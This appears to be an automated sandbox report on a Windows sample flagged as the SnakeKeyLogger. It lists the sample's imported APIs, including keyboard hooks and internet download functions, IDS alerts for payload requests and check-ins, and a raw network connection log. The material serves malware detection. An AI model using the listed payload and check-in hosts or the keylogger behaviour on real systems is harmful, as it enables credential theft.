                                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                            user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                            ole32.dllCLSIDFromString
                                                                                                            kernel32.dllSleep
                                                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                            ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                            oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                            comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                            shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                            wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                            shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                            advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                            wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                            netapi32.dllNetbios
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            TurkishTurkey
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-15T11:23:35.970223+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649708142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:36.016711+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649709142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:36.267286+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.164971169.42.215.25280TCP
                                                                                                            2024-11-15T11:23:37.221878+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649712142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:37.282448+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649714142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:38.477084+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649719142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:38.512493+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649720142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:39.997079+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649728142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:40.003936+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649727142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:41.223641+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649733142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:41.224036+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649735142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:42.466260+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649738142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:42.466655+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649737142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:43.988205+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649746142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:43.991183+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649747142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:45.225404+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649753142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:45.235927+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649751142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:46.440222+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649755142.250.186.78443TCP
                                                                                                            2024-11-15T11:23:46.447453+01002044887ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)1192.168.2.1649756142.250.186.78443TCP
                                                                                                            2024-11-15T11:24:38.185016+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.164977169.42.215.25280TCP
                                                                                                            2024-11-15T11:24:40.556228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.164978113.107.246.45443TCP
                                                                                                            2024-11-15T11:24:48.608299+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.164981613.107.246.45443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 15, 2024 11:23:34.695476055 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:34.695569038 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:34.695672035 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:34.702364922 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:34.702394962 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:34.761499882 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:34.761523962 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:34.761814117 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:34.762089968 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:34.762096882 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.565403938 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.565524101 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.566510916 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.566617966 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.584219933 CET4971180192.168.2.1669.42.215.252
                                                                                                            Nov 15, 2024 11:23:35.589103937 CET804971169.42.215.252192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.589190006 CET4971180192.168.2.1669.42.215.252
                                                                                                            Nov 15, 2024 11:23:35.589334011 CET4971180192.168.2.1669.42.215.252
                                                                                                            Nov 15, 2024 11:23:35.594307899 CET804971169.42.215.252192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.608686924 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.608756065 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.609672070 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.609746933 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.612704039 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.642107964 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.642216921 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.643400908 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.643493891 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.647883892 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.647897959 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.648366928 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.648457050 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.648864985 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.655339956 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.691335917 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.970278025 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.970365047 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.970400095 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.970503092 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.971586943 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.971620083 CET44349708142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.971679926 CET49708443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.972346067 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.972394943 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.972470045 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.972749949 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:35.972767115 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.982443094 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:35.982496023 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:35.982594013 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:35.982886076 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:35.982898951 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.016720057 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.016779900 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.016793013 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.016834974 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.016905069 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.016951084 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.017108917 CET44349709142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.017162085 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.017184019 CET49709443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.017431974 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.017473936 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.017544985 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.017606020 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.017647028 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.017710924 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.017745018 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.017771006 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.018008947 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.018019915 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.267127991 CET804971169.42.215.252192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.267286062 CET4971180192.168.2.1669.42.215.252
                                                                                                            Nov 15, 2024 11:23:36.849402905 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.849499941 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.850817919 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.850883007 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.854660034 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.854679108 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.855169058 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.855241060 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.855557919 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.863892078 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.863980055 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.867388010 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.867413998 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.867830992 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.867904902 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.868177891 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.872169971 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.872262001 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.875421047 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.875432968 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.875761986 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.875823975 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.876118898 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:36.899339914 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.909109116 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.909184933 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.910181999 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.910243988 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.911339045 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.912909031 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.912934065 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.913261890 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.913326979 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.913570881 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:36.923335075 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:36.955338001 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.221889973 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.221978903 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.222007990 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.222052097 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.222162008 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.222260952 CET44349712142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.222381115 CET49712443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.222906113 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.222975969 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.223220110 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.223529100 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.223550081 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.282455921 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.282839060 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.282865047 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.283243895 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.283453941 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.283504009 CET44349714142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.283564091 CET49714443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.287659883 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.287718058 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.288153887 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.288153887 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:37.288203001 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.291343927 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.291517019 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.291549921 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.291570902 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.295622110 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.297769070 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.297835112 CET44349713142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.297871113 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.297913074 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.297943115 CET49713443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.300014973 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.300014973 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.300051928 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.438503981 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.438739061 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.438976049 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.439131021 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.439140081 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.439255953 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.439604998 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.439685106 CET44349715142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.439863920 CET49715443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.440176964 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.440243006 CET44349722142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:37.440538883 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.440538883 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:37.440613031 CET44349722142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.098987103 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.099385977 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.101752996 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.101924896 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.105125904 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.105134964 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.105479956 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.106095076 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.106095076 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.136626959 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.136706114 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.137263060 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.137352943 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.140235901 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.140254974 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.140455008 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.140672922 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.140944958 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.147370100 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.164855003 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.165457964 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.166552067 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.166579962 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.167666912 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.168061972 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.168148041 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.187330008 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.211380005 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.311111927 CET44349722142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.311208963 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.313282013 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.313298941 CET44349722142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.313635111 CET44349722142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.313700914 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.314141035 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.355333090 CET44349722142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.477128983 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.477221966 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.477257013 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.477319002 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.477381945 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.477456093 CET44349719142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.477511883 CET49719443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.478063107 CET49723443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.478120089 CET44349723142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.478184938 CET49723443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.478584051 CET49723443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.478602886 CET44349723142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.512492895 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.512554884 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.512569904 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.512608051 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.512681961 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.512713909 CET44349720142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.512763977 CET49720443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.513318062 CET49724443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.513365030 CET44349724142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.513442039 CET49724443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.513801098 CET49724443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.513820887 CET44349724142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.566369057 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.566471100 CET49721443192.168.2.16142.250.185.65
